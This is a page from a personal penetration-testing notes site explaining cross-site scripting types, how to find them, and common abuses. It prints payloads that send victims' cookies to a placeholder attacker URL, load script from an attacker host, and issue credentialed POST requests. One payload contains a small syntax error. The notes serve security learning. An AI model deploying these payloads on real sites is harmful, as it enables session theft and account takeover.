Hacking Notes
  • Hacking Notes
  • Penetration Testing Methodology
    • Host Discovery
    • Information Gathering
    • Exploit Research
    • Exploit Development
    • Exploit Testing
    • Exploiting
    • Information Gathering
    • Privilege Escalation
  • Shells
    • Reverse Shell Cheat Sheet
    • Bind Shell Cheat Sheet
    • Webshells
    • C Shell
  • Stuck?
  • LICENSE
  • Windows
    • Windows Information Gathering
    • Windows PrivEsc
      • Method
      • PE Scripts
      • Potatos
      • Windows Privs
    • Transferring Files
    • Active Directory
      • ad-attacks
      • auth-enumeration
      • unauth-enumeration
      • authentication-delegation
      • reference
      • Kerberos
        • Authentication Delegation
      • mind-map
    • LNK Files
    • SCF Files
    • Compile Code
    • Tips & Tricks
  • Linux
    • Linux OS Information Gathering
    • Linux PrivEsc
      • methodology
      • Privilege Escalation Scripts
        • LinEnum
    • Hosting Files
    • Linux File System
    • Scheduling Jobs
    • POSIX
      • Scripting
      • Notes
  • Web Application Testing
    • Methodology
    • Enumeration
    • Attacks
      • SQLi
      • File Inclusion
      • Directory Traversal
      • Cross-Site Scripting
      • Login Forms
      • Content Injection
      • XSS
    • Assessment Tools
      • ZAP
      • ffuf
      • Nikto
      • wpscan
      • zap
    • Wordpress
      • wpscan
    • Apache
    • Nostromo
  • Services
    • Services
      • Active Directory Administration
      • Cups
      • DFSR
      • DHCP Client
      • DHCP Server
      • DNS
      • FTP
      • HTTP
      • HTTP(S)
      • IIS
      • Imap Encrypted
      • IMAP
      • IPsec
        • Kerberos
        • LDAP
        • ldaps
        • MSRPC
        • MSSQL
        • MySQL
        • Netbios Datagram Service
        • Netbios Name Service
        • Netbios Session Service
        • NFS
        • NNTP
        • NTP
        • Oracle
        • POP3
        • POP3 Encrypted
        • RDP
      • Redis
        • RFSP
        • RPCbind / Portmapper
        • RSIP
        • RTSP
      • RSYNC
        • SMB
        • SMTP
        • SNMP
        • SSH
        • Telnet
        • TFTP
        • VNC
      • VNC Remote Desktop
      • VNC Web Interface
        • WinRM
      • Wins
  • Containers
    • Docker
  • Buffer Overflow
    • Buffer Overflow
    • win32
  • Tools
    • Windows
      • chisel
      • mimikatz
      • mssqlclient.py
      • plink
      • psexec.py
      • smbeagle
      • winexe
    • Linux
      • chisel
      • evil-winrm
      • exiftool
      • Impacket
        • GetADUsers
        • GetNPUsers
        • getST
        • getTGT
        • GetUserSPNS
        • secretsdump
        • smbclient
        • wmiexec
      • jd-gui
      • ldapsearch
      • strings
      • smbeagle
      • Helpful Sites
  • Misc
    • Tunneling
    • Cryptography
    • Regex
    • Tools to Checkout
  • Password Cracking
    • Hashcat
    • John The Ripper
  • Tunneling
    • Tunnels
  • Web3
    • Introduction
    • Audit Process
    • Report Writing
    • List of Tools
    • Web3 References
Powered by GitBook
On this page
  • Stored XSS
  • Reflected XSS
  • DOM-Based XSS
  • Identifying XSS
  • Common Abuses
  • Stealing Cookies
  • Running JavaScript from Attacker Machine
  • Client-Side Attacks
  • Redirects
  • Phishing
  • Key Logger
  • Tools

Was this helpful?

  1. Web Application Testing
  2. Attacks

Cross-Site Scripting

This attack is possible do to unsanitized input being displayed on a web page.

Stored XSS

This occurs when the payload is stored or otherwise cached by the server.

Reflected XSS

The web application displays the value given but does not store it. Websites frequently do this with search features. These attacks can only attack the person submitting the request and usually are sent to a victim as a link.

DOM-Based XSS

Takes place within the pages Document Object Model. I am really foggy on this one...

Identifying XSS

Look for input that is reflected on the site. If you find user controlled input displayed on the site, you can then check to see if special characters are sanitized or if they are being interpreted.

When looking for where the input is displayed, consider that it may only get displayed to someone else. For example, if you submit a help ticket, the XSS may happen in the helpdesk technician's browser and cannot be viewed by anyone else.

Also be sure to check around the site for where your text may be displayed. Use unique text and document where you used it that way if you come across it later you know where it came from.

One method to check is to try HTML tags such has the H1 tag <h1>Some Text</h1> to see if it gets rendered or not. You may want to also try to create an alert box using JavaScript. <script>alert('BOOM')</script>.

Common Abuses

Stealing Cookies

<script>
    new Image().src="http://<YOUR URL>/cool.jpg?giveMe="+document.cookie
</script>
<img src=x onerror=this.src='http://<YOUR URL>/?cookies='btoa(document.cookie) />

bbtoa will convert the cookie to base64

With this injected into a site with XSS, you just wait for a connection which hopefully will have an authenticated cookie.

Running JavaScript from Attacker Machine

If you can set up an xss that can reach another system you control, you can run a Javascript file on their client.

<script src=http://URL/script.js></script>

Run Post Request from Target Client

Create a Javascript file to host that will send a post request from the target machine.

var xhr = new XMLHttpRequest();  
var url = "http://TARGET-URL";  
var params = "PARAMS TO BE SENT";  
xhr.open("POST", url);  
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');  
xhr.withCredentials = true;  
xhr.send(params);

Client-Side Attacks

Redirects

Phishing

Key Logger

Tools

PreviousDirectory TraversalNextLogin Forms

Last updated 3 years ago

Was this helpful?

BeEF